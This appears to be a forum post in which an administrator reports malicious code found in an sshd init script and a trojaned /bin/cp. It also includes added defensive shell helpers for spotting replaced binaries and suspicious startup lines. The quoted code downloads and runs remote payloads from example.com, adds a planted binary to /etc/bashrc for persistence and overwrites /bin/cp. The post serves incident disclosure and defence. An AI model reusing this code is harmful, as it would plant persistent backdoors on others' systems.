Hi guys
Today I detected some weird lines in /etc/init.d/sshd in the start function; this is the content:
Code:
start()
{
[ -x $SSHD ] || exit 5
[ -f /etc/ssh/sshd_config ] || exit 6
# Create keys if necessary
if [ "x${AUTOCREATE_SERVER_KEYS}" != xNO ]; then
do_rsa_keygen
if [ "x${AUTOCREATE_SERVER_KEYS}" != xRSAONLY ]; then
do_rsa1_keygen
do_dsa_keygen
fi
fi
Inject='/etc/bashrc' #/etc/bashrc
Bar='/bin/bar' #/bin/bar
if [[ ! -a $Bar ]]; then
wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
chmod 755 bar >/dev/null 2>&1
mv bar $Bar >/dev/null 2>&1
fi;
if ! grep -q $Bar $Inject; then
echo -e "$Bar >/dev/null 2>&1" >> $Inject
fi;
if [[ ! grep -q "example.com" /bin/cp ]]; then
cp /bin/cp /bin/copy >/dev/null 2>&1
echo -e '#!/bin/sh\r\nwget http://example.com/Dynamic/g/run.txt >/dev/null 2>&1\r\nmv run.txt run.php\r\nchmod +x run.php\r\nphp run.php\r\nrm -rf run.php >/dev/null 2>&1' > /bin/cp
chmod 755 /bin/cp
fi;
Now the content of /bin/cp is:
Code:
#!/bin/bash
Inject="/etc/bashrc" #/etc/bashrc
Bar="/bin/bar" #/bin/bar
if [[ ! -a $Bar ]]; then
wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
chmod 755 bar >/dev/null 2>&1
mv bar $Bar >/dev/null 2>&1
fi;
if ! grep -q "$Bar" $Inject; then
echo -e "\n$Bar >/dev/null 2>&1" >> $Inject
fi;
copy
Have any of you experienced this?
Checking this URL http://example.com/Dynamic/g/run.txt, it looks like very dangerous code; now I have to research how it happened.
Any advice or comment?
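The post shows two persistence tricks: a startup file (/etc/bashrc, the sshd init script) made to run a planted path, and a core binary (/bin/cp) overwritten with a shell script. The triage helpers below are an added example, not code from the poster or any tool; they check a file for the ELF magic versus a "#!" header and list startup lines that download code or reference a planted path. The only assumption is a POSIX sh with od, head, grep and mktemp; the sample files are constructed in a temp dir so nothing on the real system is touched.

```shell
#!/bin/sh
# Added triage helpers, not from the original post. Assumes POSIX sh, od, head, grep, mktemp.

# Return 0 if the file starts with the ELF magic bytes 7f 45 4c 46, 1 otherwise.
is_elf() {
    [ "$(od -An -N4 -tx1 "$1" 2>/dev/null | tr -d ' \n')" = "7f454c46" ]
}

# Return 0 if a file that should be a compiled binary now starts with "#!".
# A genuine coreutils /bin/cp is ELF; a shell shebang there means it was replaced.
binary_replaced_by_script() {
    ! is_elf "$1" && [ "$(head -c 2 "$1" 2>/dev/null)" = "#!" ]
}

# Print startup-file lines that fetch code or invoke the planted path.
# $1 = file to scan (e.g. /etc/bashrc, /etc/init.d/sshd), $2 = planted path (e.g. /bin/bar)
suspicious_startup_lines() {
    grep -nE "wget |curl |$2" "$1" 2>/dev/null
}

# Number of such lines, for callers that want a count rather than the text.
suspicious_startup_count() {
    suspicious_startup_lines "$1" "$2" | wc -l | tr -d ' '
}

# Constructed sample data mirroring the post, written to a temp dir.
demo() {
    d=$(mktemp -d)
    printf '\177ELF\002\001\001' > "$d/cp.good"                       # a real binary header
    printf '#!/bin/bash\n/bin/bar >/dev/null 2>&1\n' > "$d/cp.bad"    # the trojaned cp
    printf 'alias ll="ls -l"\n/bin/bar >/dev/null 2>&1\n' > "$d/bashrc"
    binary_replaced_by_script "$d/cp.good" && echo "cp.good: replaced" || echo "cp.good: ELF, ok"
    binary_replaced_by_script "$d/cp.bad" && echo "cp.bad: replaced by a script" || echo "cp.bad: ok"
    echo "bashrc suspicious lines: $(suspicious_startup_count "$d/bashrc" /bin/bar)"
    suspicious_startup_lines "$d/bashrc" /bin/bar
    rm -rf "$d"
}

demo
```

On a real host, run the same checks against /bin/cp, /etc/bashrc and the init scripts, and compare the binaries against the package manager's file list (for example `rpm -V` or `debsums`) rather than trusting the file on disk.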